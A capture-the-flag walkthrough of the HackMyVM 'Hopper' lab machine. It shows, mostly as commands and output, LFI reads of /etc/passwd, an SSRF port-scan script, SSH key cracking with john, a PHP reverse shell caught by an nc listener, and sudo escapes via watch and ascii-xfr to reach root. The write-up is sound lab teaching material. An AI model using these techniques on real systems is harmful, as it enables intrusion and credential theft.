日度归档:2021 年 8 月 30 日

HackMyVm Hopper Walkthrough

发表评论

HackMyVm Hopper Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hopper

Scan ports.

~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log                  
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-30 11:29 CST
 Nmap scan report for bogon (192.168.56.100)
 Host is up (0.00079s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 fc:84:7e:5d:15:85:4d:01:d3:7b:5a:00:de:a4:73:37 (RSA)
 |   256 54:f5:ea:db:a0:38:e2:c8:5a:db:30:91:3e:78:b4:b9 (ECDSA)
 |_  256 97:b6:b8:f7:cb:15:f5:6b:cd:92:5f:66:26:28:47:07 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enum port 80.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.z[500/1872]
403,404,500 --wildcard -o 80.log

/index.html (Status: 200) [Size: 80]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
/advanced-search (Status: 301) [Size: 326] [--> http://192.168.56.100/advanced-search/]


Check /advanced-search, input anything and click "Submit", notice the url became "http://192.168.56.100/advanced-search/path.php?path=xxx". Fuzz if there is LFI.

 ```bash
~ wfuzz -u 'http://192.168.56.100/advanced-search/path.php?path=file://FUZZ' --hh 0  -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.
 txt                                                                                                    
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000005:   200        227 L    1115 W     7224 Ch     "/etc/apache2/apache2.conf"
 000000001:   200        27 L     39 W       1439 Ch     "/etc/passwd"
 000000018:   200        12 L     88 W       664 Ch      "/etc/fstab"                                    
 ...
 000000188:   200        0 L      1 W        32064 Ch    "/var/log/faillog"
 000000224:   200        1 L      4 W        1151 Ch     "/var/run/utmp"
 000000220:   200        34 L     237 W      164321 Ch   "/var/log/wtmp"
 000000199:   200        0 L      1 W        292584 Ch   "/var/log/lastlog"

Get username through passwd.

```bash
~ curl 'http://192.168.56.100/advanced-search/path.php?path=file:///etc/passwd';
root:x:0:0:root:/root:/bin/bash
...
edward:x:1000:1000:edward,,,:/home/edward:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
henry:x:1001:1001::/home/henry:/bin/bash


Make a python script to enum local port.

 ```python
#!/usr/bin/python3
 import requests

 for port in range(1,65535):
     res = requests.get(f'http://192.168.56.100/advanced-search/path.php?path=http://127.0.0.1:{port}')
     if len(res.text) == 0:
         continue
     else:
         print(f'port {port} is open.')

Port 2222 is open.

```bash
~ python3 enum.py
port 22 is open.
port 80 is open.
port 2222 is open.


Check port 2222.

 ```bash
~ curl 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222'    
 <!DOCTYPE html>
 <html>
 <body>

 <h1>[+] WARNING</h1>

 <p> - Private corporative web server</p>

 <p> - If you are non organization personal, leave immediately</p>

 </body>
 </html>

Fuzz dirs of port 2222.

```bash
~ gobuster dir -u 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222'; -t 50 -w /usr/share/dirbuster/wordlists/directory-lis
t-2.3-medium.txt -b 401,403,404,500 --wildcard --exclude-length 181

/backup (Status: 200) [Size: 1751]
...


Get a id_rsa key at /backup. Chmod 600. Burteforce the key of id_rsa.

 ```bash
~ /usr/share/john/ssh2john.py id_rsa  > hash.txt  
 & kali @ mykali in ~/Documents/hopper 0 [13:03:29]
 ~ john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt                                         ...
 barcelona        (id_rsa)

Login ssh with user name edward.

 ~ ssh edward@192.168.56.100 -i id_rsa
 Enter passphrase for key 'id_rsa':
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /home/edward/.Xauthority does not exist
 edward@hopper:~$ id
 uid=1000(edward) gid=1000(edward) grupos=1000(edward),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Upload a reverse shell php and get shell as www-data.

 ~ curl http://192.168.56.100/r.php
 ────────────────────────────────────────────────────────────────────────────────────────────────────────

 & kali @ mykali in ~/Documents/hopper 0 [13:07:35]
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:35698.
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
  07:07:50 up  1:41,  0 users,  load average: 0.01, 0.02, 0.02
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Check sudo -l.

```bash
www-data@hopper:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on hopper:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on hopper:
(henry) NOPASSWD: /usr/bin/watch


Set the term environment variable, and escalate to user henry.

```bash
 www-data@hopper:/$ export TERM=xterm-256color
 export TERM=xterm-256color
 www-data@hopper:/$ sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
 sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
 $ id
 id
 uid=1001(henry) gid=1001(henry) groups=1001(henry)</code></pre>
<p>Upload id_rsa.pub to /home/henry/.ssh/, change name to authorized_keys, and get ssh login as user henry.</p>
<pre><code class="language-bash">~ ssh henry@192.168.56.100
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /home/henry/.Xauthority does not exist
 henry@hopper:~$ id
 uid=1001(henry) gid=1001(henry) grupos=1001(henry)</code></pre>
<p>Check sudo -l.</p>
<pre><code class="language-bash"> henry@hopper:~$ sudo -l
 Matching Defaults entries for henry on hopper:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User henry may run the following commands on hopper:
     (root) NOPASSWD: /usr/bin/ascii-xfr</code></pre>
<p>Use ascii-xfr to create a authorzied_keys of root.</p>
<p>```bash
henry@hopper:~$ sudo ascii-xfr -rv /root/.ssh/authorized_keys < .ssh/authorized_keys
ASCII download of "/root/.ssh/authorized_keys"</p>
<p>0.6 Kbytes transferred at 565 CPS... Done.</p>
<pre><code>
Login as root.

```bash
 ~ ssh root@192.168.56.100
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /root/.Xauthority does not exist
 root@hopper:~# id;hostname
 uid=0(root) gid=0(root) grupos=0(root)
 hopper